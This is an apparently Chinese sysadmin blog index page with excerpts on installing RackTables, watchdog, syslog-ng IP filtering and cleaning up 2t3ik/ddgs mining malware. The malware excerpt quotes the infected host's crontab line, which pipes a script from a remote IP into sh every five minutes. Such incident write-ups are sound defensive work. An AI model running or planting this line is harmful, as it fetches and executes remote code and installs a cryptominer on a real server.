RackTables(一)CMDB 资管系统安装

2018年4月25日 没有评论

RackTables称自己为一个“机架空间、IP地址、服务器、交换机、路由器等的管理框架”。说白了,个人感觉就是一个CMDB资管软件。本篇就先从安装开始吧。

一、安装数据库

yum -y install  mariadb  mariadb-server
systemctl start mariadb
systemctl enable mariadb
mysql_secure_installation
在/etc/my.cnf的配置文件中增加“character-set-server=utf8” ,修改完后,重启mariadb服务生效。

[......]

Read more

分类: 开源软件 标签:

2t3ik与ddgs挖矿病毒处理

2018年4月19日 2 条评论

一、问题现象 

朋友的阿里云LINUX服务器, 发现有2t3ik与ddgs两个异常进程,把CPU几乎耗尽了。其描述kill掉以后,过一会儿又会重新出现。 

2t3ik_worm

二、分析处理

即然kill 后过一会儿又会出现,那就有两种可能:1、crontab定时调用;2、有守护进程,个别病毒还会修改ps和top,通过这些命令无法查看到隐藏的守护进程。先看了下crontab,发现如下两条内容:

*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh[......]

Read more

分类: 安全/漏洞 标签:

watchdog及其应用

2018年4月1日 没有评论

一、watchdog介绍

watchdog 通常是一段物理电路,但这里讲的是linux 内核的实现,也就是softdog ,其原理详见IBM developerworks 。能够在系统资源耗尽之际实现系统软重启,防止硬重启带来的巨大损失。Watchdog 默认的动作是每隔1分钟往/dev/watchdog设备执行写操作,以证明系统运行正常,发现异常就主动发出重启信号。

watchdog可以通过系统编程实现一些功能,但在linux对应的rpm包里已经帮我们集成了一个watchdog应用。该watchdog 提供了两个接口test和repair 。test选项提供了测[......]

Read more

分类: Linux/unix/mac 标签:

syslog-ng通过IP过滤日志

2018年3月30日 没有评论

一、需求

负责网络的同事在搞日志集中应用,由于涉及的网络厂商有CISCO、华为、H3C、F5等,其中思科的日志格式和其他厂商的不一样,在入库并loganalyzer展示时发现部分字段有错位的问题。所以其需求是想在入库前对部分IP的网络设备的日志做整形后再入库。这里就结合下syslog-ng的过滤器功能实现下。

二、需求分析

在syslog-ng配置里,有三个比较重要的概念,监听源(source)、过滤器(filter)、和目标存(destination):

  • source指定本台日志服务器监听的IP,比如该机有多个IP,[......]

Read more

分类: 开源软件 标签:

vsftpd连接变慢处理

2018年3月14日 没有评论

sed进行十六进制替换

2018年3月10日 没有评论

bearychat+hubot搭建chatops机器人

2018年3月2日 没有评论

分享已经暴露了你的信息

2018年2月10日 没有评论

BMC Bladelogic自动化平台安装

2018年2月2日 没有评论

python itertools模块实现排列组合

2018年1月23日 没有评论